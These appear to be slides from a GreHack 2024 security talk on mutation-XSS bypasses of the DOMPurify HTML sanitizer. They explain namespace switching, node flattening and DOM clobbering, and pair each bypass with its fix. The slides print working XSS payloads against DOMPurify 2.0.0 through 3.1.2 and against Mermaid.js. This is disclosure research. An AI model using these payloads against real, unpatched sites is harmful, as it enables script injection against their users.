Playing with HTML parsing to bypass DOMPurify on default configuration
Kévin (Mizu)
Kévin GERVOT
Client-Side HTML Sanitizer
A security feature or tool used to clean HTML content by removing or altering potentially dangerous elements, attributes, or scripts, thereby preventing cross-site scripting (XSS) and other code injection attacks.
Source: ChatGPT 🤫
DOMPurify
Highly simplified version of the DOMPurify logic:
HTML string → parse HTML → sanitize elements, attributes and Shadow DOM → serialize HTML → HTML string
Why are mXSS possible?
It is possible that the output of this algorithm, if parsed with an HTML parser, will not return the original tree structure.
[...]
<form><div></form><form></form>
What the sanitizer sees (DOM tree, all xhtml): <form> > <div> > <form>
What the DOM sees (DOM tree, all xhtml): <form> > <div>
Namespaces
<style><a>
DOM tree: <style> (xhtml) > "<a>" (text)
<svg><style><a>
DOM tree: <svg> (svg) > <style> (svg) > <a> (svg, node)
<math><style><a>
DOM tree: <math> (mathml) > <style> (mathml) > <a> (mathml, node)
Integration points
List of MathML text integration points: <mi> | <mo> | <mn> | <ms> | <mtext>
List of HTML integration points: <annotation-xml> | <foreignObject> | <desc> | <title>
<svg><title><a>
DOM tree: <svg> (svg) > <title> (svg) > <a> (xhtml)
We can switch from SVG to HTML!
DOMPurify 2.0.0 bypass
(Found by @SecurityMB)
<svg></p><style><a id="</style><img src=x onerror=x>">
What DOMPurify 2.0.0 sees: <svg> (svg) containing <p> and <style> (svg) > <a id="</style>XSS"> (svg)
After .innerHTML: <svg> (svg), <p> (xhtml), <style><a id="</style> (xhtml), <img src=x onerror=x>"> (xhtml)
The <style> tag falls into the HTML namespace, changing its content from a node to text.
DOMPurify 3.1.0 bypass
(IcesFont)
Node flattening
The algorithm described below places no limit on the depth of the DOM tree generated, or on the length of tag names, attribute names, attribute values, Text nodes, etc.
Language | Library | Nested node limit | Handling |
---|---|---|---|
C | libxml2 | 255 | Removing |
JavaScript | parse5 | No limit? | - |
Python | html.parser | No limit? | - |
Java | Jsoup | No limit? | - |
Browser | DOMParser | 512 | Flattening |
<div*509><svg><style>
DOM tree: <div*509> (xhtml) > <svg> (svg) > <style> (svg)
<div*510><svg><style>
DOM tree: <div*510> (xhtml) > <svg> (svg), with <style> (svg) flattened into a sibling of <svg>
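The `<div*N>` shorthand in these payloads stands for N nested opening `<div>` tags. A minimal sketch of how such test strings could be built follows; the helper name `nestedPayload` is made up for illustration, and the sketch only builds strings without running any parser.

```javascript
// Hypothetical helper: expands the slide shorthand <tag*N> into N opening tags
// followed by an inner payload. Nothing here touches a real HTML parser.
function nestedPayload(tag, count, inner) {
  return `<${tag}>`.repeat(count) + inner;
}

// According to the slides, 509 <div> elements keep <style> nested inside <svg>.
const below = nestedPayload("div", 509, "<svg><style>");
// According to the slides, one more <div> is enough for <style> to be flattened.
const above = nestedPayload("div", 510, "<svg><style>");

console.log(below.length, above.length);
```

Feeding both strings to `DOMParser` in a browser and comparing the resulting trees is one way to observe the flattening described above.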
<a><a>
DOM tree: <a> (xhtml) followed by a sibling <a> (xhtml)
<div*509><a><svg><a>
DOM tree: <div*509> (xhtml) > <a> (xhtml) > <svg> (svg), with the second <a> (svg) flattened into a sibling of <svg>
HTML Parsing states
13.2.4 Parse state
13.2.4.1 The insertion mode
13.2.4.2 The stack of open elements
13.2.4.3 The list of active formatting elements
13.2.4.4 The element pointers
13.2.4.5 Other parsing state flags
Source: HTML Specification.
HTML Insertion modes
The insertion mode is a state variable that controls the primary operation of the tree construction stage.
Initially, the insertion mode is "initial". It can change to "before html" [...] "after after frameset" during the course of the parsing [...]. The insertion mode affects how tokens are processed [...].
"in caption" insertion mode
The user agent must handle the token as follows:
[...]
↳ A start tag whose tag name is one of: "caption" [...]
[...]
Pop elements from this stack until a caption element has been popped from the stack.
Stack of open elements
The stack grows downwards; the topmost node on the stack is the first one added to the stack, and the bottommost node of the stack is the most recently added node in the stack [...].
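The "pop elements from this stack until a caption element has been popped" rule can be pictured with a plain array. This is only a toy model under stated assumptions: element names are strings, and `popUntilPopped` is a hypothetical helper, not a parser API.

```javascript
// Toy model of the stack of open elements: index 0 is the topmost (first added)
// node, the last index is the bottommost (most recently added) node.
function popUntilPopped(stack, tagName) {
  const popped = [];
  while (stack.length > 0) {
    const node = stack.pop();
    popped.push(node);
    if (node === tagName) break; // stop once the target has been popped
  }
  return popped;
}

// Assumed state while the parser is inside <table><caption><div>.
const openElements = ["html", "body", "table", "caption", "div"];
const closed = popUntilPopped(openElements, "caption");

console.log(closed);       // elements closed by a nested <caption> start tag
console.log(openElements); // elements that remain open afterwards
```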
<table>
<caption>
<div>1</div>
<div>2</div>
</caption>
</table>
"in caption" insertion mode
<table>
<caption>
<div>1</div>
<caption></caption>
<div>2</div>
</caption>
</table>
DOM tree (all xhtml):
<div>2</div>
<table>
  <caption>
    <div>1</div>
  <caption>
<table><caption>
<svg>
<title>
<caption></caption>
</title>
<style><a id="</style><img src onerror=x>"></a></style>
</svg>
</caption></table>
DOM tree:
<table> (xhtml)
  <caption> (xhtml)
    <svg> (svg)
      <title> (svg)
  <caption> (xhtml)
  <style><a id="</style> (xhtml)
<img src=x onerror=x> (xhtml) is parsed as an element outside the <table>.
It can even traverse namespaces!
[...]
↳ Anything else
Process the token using the rules for the "in body" insertion mode.
<table><caption><table><caption>
DOM tree (all xhtml): <table> > <caption> > <table> > <caption>
<div*508>
<table><caption><table><caption>
DOM tree (all xhtml):
<div*508>
  <table>
    <caption>
      <table>
      <caption>
Nested <caption> through node flattening!
DOMPurify 3.1.0 bypass
<div*506>
<table><caption>
<svg>
<title>
<table><caption></caption></table>
</title>
<style><a id="</style><img src onerror=x>"></a></style>
</svg>
</caption></table>
What DOMPurify 3.1.0 sees:
<div*506> (xhtml)
  <table> (xhtml)
    <caption> (xhtml)
      <svg> (svg)
        <title> (svg)
          <table> (xhtml)
          <caption> (xhtml)
        <style> (svg)
          <a id="[...]"> (svg)
After .innerHTML:
<div*506> (xhtml)
  <img src onerror=x>"> (xhtml)
  <table> (xhtml)
    <caption> (xhtml)
      <svg> (svg)
        <title> (svg)
          <table> (xhtml)
    <caption> (xhtml)
    <style><a id="</style> (xhtml)
DOMPurify 3.1.1 bypass
(Me)
DOMPurify 3.1.1 fix
1. The nested nodes limit is set to 252
currentNode.__depth = currentNode.parentNode.__depth + 1;
/* Remove an element if nested too deeply to avoid mXSS */
if (currentNode.__depth >= MAX_NESTING_DEPTH) {
  _forceRemove(currentNode);
}
Highly simplified version of the DOMPurify 3.1.1 fix
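To make the depth bookkeeping concrete, here is a small sketch on plain objects instead of DOM nodes. The tree shape (`{ name, children }`), the helpers `pruneDeepNodes`, `chain` and `height`, and the tiny limit of 5 are all assumptions chosen for illustration; only the "parent depth plus one, remove at the limit" idea comes from the simplified fix above.

```javascript
// Assumed limit for this sketch only; the real constant lives in DOMPurify.
const MAX_NESTING_DEPTH = 5;

// Assigns parent depth + 1 to every node and drops the children of any node
// whose children would reach the limit.
function pruneDeepNodes(node, parentDepth = 0) {
  node.__depth = parentDepth + 1;
  if (node.__depth + 1 >= MAX_NESTING_DEPTH) {
    node.children = []; // every child would reach the limit, so remove them
  }
  node.children.forEach((child) => pruneDeepNodes(child, node.__depth));
  return node;
}

// Builds a chain of `length` nested nodes, similar to <div*N>.
function chain(length) {
  let node = null;
  for (let i = 0; i < length; i++) {
    node = { name: "div", children: node ? [node] : [] };
  }
  return node;
}

// Number of levels left in the tree.
function height(node) {
  return 1 + Math.max(0, ...node.children.map(height));
}

const tree = pruneDeepNodes(chain(8));
console.log(height(tree));
```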
2. DOM Clobbering protection
elm instanceof HTMLFormElement && (
typeof elm.__depth !== 'undefined' &&
typeof elm.__depth !== 'number'
)
Highly simplified version of the DOMPurify 3.1.1 fix
DOM Clobbering
<div id="x">
<form id="y">
<input name="z">
</form>
</div>
» x
← <div [...]>
» y.z
← <input [...]>
<div>
<form id="f">
<input name="parentNode">
</form>
</div>
» f.parentNode
← <input name="pare[..]">
» f.parentNode.__depth
← undefined
currentNode.__depth = currentNode.parentNode.__depth + 1;
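Why a clobbered `parentNode` defeats the check comes down to plain JavaScript arithmetic: `undefined + 1` is `NaN`, and any comparison with `NaN` is false. The sketch below reproduces this with ordinary objects standing in for DOM nodes; `trackDepth` and the object shapes are hypothetical, and 252 is simply the limit quoted on the slide.

```javascript
const MAX_NESTING_DEPTH = 252; // value quoted on the slide

// Same bookkeeping as the simplified fix, applied to plain objects.
function trackDepth(node) {
  node.__depth = node.parentNode.__depth + 1;
  return node.__depth >= MAX_NESTING_DEPTH; // true means "remove this node"
}

// Honest case: the parent carries a numeric depth just below the limit.
const honestParent = { __depth: 251 };
const honestChild = { parentNode: honestParent };

// Clobbered case: parentNode resolves to an <input name="parentNode">,
// which has no __depth property at all.
const clobberingInput = { name: "parentNode" };
const clobberedForm = { parentNode: clobberingInput };

console.log(trackDepth(honestChild));   // true: 252 >= 252
console.log(trackDepth(clobberedForm)); // false: undefined + 1 is NaN
console.log(clobberedForm.__depth);     // NaN
```

Every descendant of the clobbered form then inherits `NaN + 1`, which is still `NaN`, so none of them ever reaches the limit.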
DOMPurify depth bypass
<div*200><form><input name="parentNode"><div*200>
DOMPurify 3.1.1 sees (all xhtml): <div*200> > <form> > <input> followed by <div*200>
DOMPurify 3.1.1 bypass
<div*200>
<form>
<input name="parentNode">
<div*200>
<form></form><form>
<input name="parentNode">
<div*105>
[DOMPurify 3.1.0 bypass]
DOMPurify 3.1.2 bypass
(Me)
DOMPurify 3.1.2 fix
1. Access .parentNode using the getter.
2. Block SVG-to-HTML namespace switch.
const HTML_INTEGRATION_POINTS = ['foreignobject', 'annotation-xml'];
Highly simplified version of the DOMPurify 3.1.2 fix
<svg><title><a>
DOMPurify 3.1.2: <svg> (svg) > <title> (svg)
Second order DOM Clobbering
<form id="x"></form>
<input form="y" name="z">
» x.z
← undefined
» x.id="y"
← "y"
» y.z
← <input [...] name="z">
DOMPurify attributes sanitizing
<div id="a "></div>
DOMPurify 3.1.2: <div id="a"> (xhtml)
- Takes the value
- Trims it
- Sanitizes it
- Overwrites it
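The four steps above matter because trimming can change which form an `<input form="...">` points at. The following sketch models that on plain objects; `sanitizeAttribute` and `findFormOwner` are hypothetical stand-ins, the "sanitize" step is a no-op, and the id lookup is a simplification of how browsers resolve the `form` attribute.

```javascript
// Hypothetical stand-in for the attribute pass: takes the value, trims it,
// "sanitizes" it (a no-op here) and writes the result back.
function sanitizeAttribute(element, name) {
  const value = element.attributes[name];
  const trimmed = value.trim();
  const sanitized = trimmed; // placeholder for the real checks
  element.attributes[name] = sanitized;
}

// Toy lookup mimicking how form="a" is matched against element ids.
function findFormOwner(elements, input) {
  return elements.find((el) => el.attributes.id === input.attributes.form) ?? null;
}

const form = { tag: "form", attributes: { id: "a " } };
const input = { tag: "input", attributes: { form: "a", name: "__depth" } };

console.log(findFormOwner([form], input));          // no owner yet: "a " !== "a"
sanitizeAttribute(form, "id");
console.log(findFormOwner([form], input) === form); // owner appears after trimming
```

In other words, the clobbering only becomes active once the sanitizer itself has rewritten the `id`.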
DOMPurify depth bypass
<form id="a "><div*500></div*500></form>
<input form="a" name="__depth">
DOMPurify 3.1.2 sees (all xhtml): <form id="a"> > <div*500>, followed by <input name="__depth">
For some obscure reason, it doesn't work on Firefox :(
Finding new HTML mutations
... FUZZING!
"Elevator" HTML mutation
<x><y><z>
<button>
<z>
<button></button>
</z>
</button>
<style></style>
</z></y></x>
DOM tree (all xhtml):
<x>
  <y>
    <z>
      <button>
        <z>
      <button>
    <style>
<button> can be <dd>, <dt>, <li> or <table>
<x><y><z>
<button>
<x>
<button></button>
</x>
</button>
<style></style>
</z></y></x>
DOM tree (all xhtml):
<x>
  <y>
    <z>
      <button>
        <x>
      <button>
<style>
<button> can be <dd>, <dt>, <li> or <table>
<svg><y><title><z>
<button>
<y><z>
<button></button>
</z></y>
</button>
<style></style>
</z></title></y></svg>
DOM tree:
<svg> (svg)
  <y> (svg)
    <title> (svg)
      <z> (xhtml)
        [Elevator]
  <style> (svg)
It can even traverse namespaces!
DOMPurify HTML/SVG tags
const COMMON_SVG_AND_HTML_ELEMENTS = addToSet({}, [
  'title',
  'style',
  'font',
  'a',
  'script',
]);
Source: DOMPurify - /src/purify.js.
Still not working...
Can't switch from SVG namespace to HTML namespace...
... FUZZING!
"Elevator" HTML mutation v2
<x><svg>
<image><x>
<title>
<image></image>
</title>
</x></image>
<style></style>
</svg></x>
DOM tree:
<x> (xhtml)
  <svg> (svg)
    <image> (svg)
      <x> (svg)
        <title> (svg)
          <image>
<style> (xhtml)
Browser <image> to <img> conversion works too!
<div*507>
<svg>
<image>
<title>
<svg>
<image></image>
</svg>
</title>
</image>
</svg>
DOM tree:
<div*507> (xhtml)
  <svg> (svg)
    <image> (svg)
      <title> (svg)
        <svg> (svg)
        <image> (svg)
Even if we use HTML integration points, we do not switch to HTML :)
DOMPurify 3.1.2 bypass
<form id="x ">
<div*504>
<a><svg>
<image>
<a><title>
<svg><image></image></svg>
</title></a>
</image>
<style><a id="</style><img src=x onerror=x>"></a></style>
</svg></a>
<input form="x" name="__depth">
What DOMPurify 3.1.2 sees:
<form id="x"> (xhtml)
  <div*504> (xhtml)
    <a> (xhtml)
      <svg> (svg)
        <image> (svg)
          <a> (svg)
            <title> (svg)
              <svg> (svg)
              <image> (svg)
        <style> (svg)
          <a> (svg)
    <input name="__depth"> (xhtml)
After .innerHTML:
<form id="x"> (xhtml)
  <div*504> (xhtml)
    <a> (xhtml)
      <svg> (svg)
        <image> (svg)
          <a> (svg)
            <title> (svg)
              <svg> (svg)
              <img> (xhtml)
    <style><a id="</style> (xhtml)
    <img src onerror=x>"> (xhtml)
    <input name="__depth"> (xhtml)
DOMPurify Triple HTML Parsing bypass
(hash_kitten, ryotkak and I)
Mermaid.js
function sanitizeMore(txt) {
  return DOMPurify.sanitize(txt);
}
text = DOMPurify.sanitize(sanitizeMore(text, config), config);
Highly simplified version of the Mermaid.js sanitizing process.
Triple HTML parsing bypass
${"<form><h1></form><table><form></form></table></form></table></h1></form>".repeat(510)}
<math>
<mi>
<style><!--</style>
<style id="--></style></mi></math><img src=x onerror=x>"></style>
</mi>
</math>
What DOMPurify 3.1.2 sees:
<form> (xhtml)
  <h1> (xhtml)
    <table> (xhtml)
      <form> (xhtml)
(pattern repeated x510, depth of 4)
<math> (mathml)
  "mXSS payload"
After .innerHTML: the repeated patterns now nest inside each other (<form> > <h1> > <table>, then the next <form>, [...]), so the new depth = nb of patterns = 510. At the bottom sit <math> (mathml), <mi> (mathml), <style><!--</style> (xhtml) and <style id="-->XSS"></style> (xhtml).
After the next .innerHTML: the <form> > <h1> > <table> [...] nesting is still there, but next to <math> (mathml) and <mi> (mathml), <style><!--[...]--></style> is now parsed in the mathml namespace, so <img src=x onerror=x> (xhtml) becomes an element.
What's next?
DOMPurify 3.1.3 fix
if (regExpTest(/((--!?|])>)|<\/(style|title)/i, value)) {
  _removeAttribute(name, currentNode);
  continue;
}
Highly simplified version of the DOMPurify 3.1.3 fix
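The regular expression in the fix can be exercised on its own to see which attribute values it rejects. In this sketch the pattern is copied from the snippet above, while `wouldBeRemoved` and the sample values are illustrative assumptions rather than DOMPurify code.

```javascript
// Pattern copied from the simplified fix above.
const DANGEROUS_ATTRIBUTE_VALUE = /((--!?|])>)|<\/(style|title)/i;

// Hypothetical helper: returns true when the attribute would be removed.
function wouldBeRemoved(value) {
  return DANGEROUS_ATTRIBUTE_VALUE.test(value);
}

// Comment terminators, a CDATA-style terminator, a closing tag, and two benign values.
const samples = ["-->", "--!>", "]>", "</STYLE><img src=x onerror=x>", "a", "--"];
for (const value of samples) {
  console.log(JSON.stringify(value), wouldBeRemoved(value));
}
```

The first four samples match and the last two do not, which is why an `id` carrying `-->` or `</style>` no longer survives sanitization.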
<div id="-->"></div>
DOMPurify 3.1.3: <div> (xhtml)
Conclusion
GreHack 2024 | Playing with HTML parsing to bypass DOMPurify on default configuration
By Kévin (Mizu)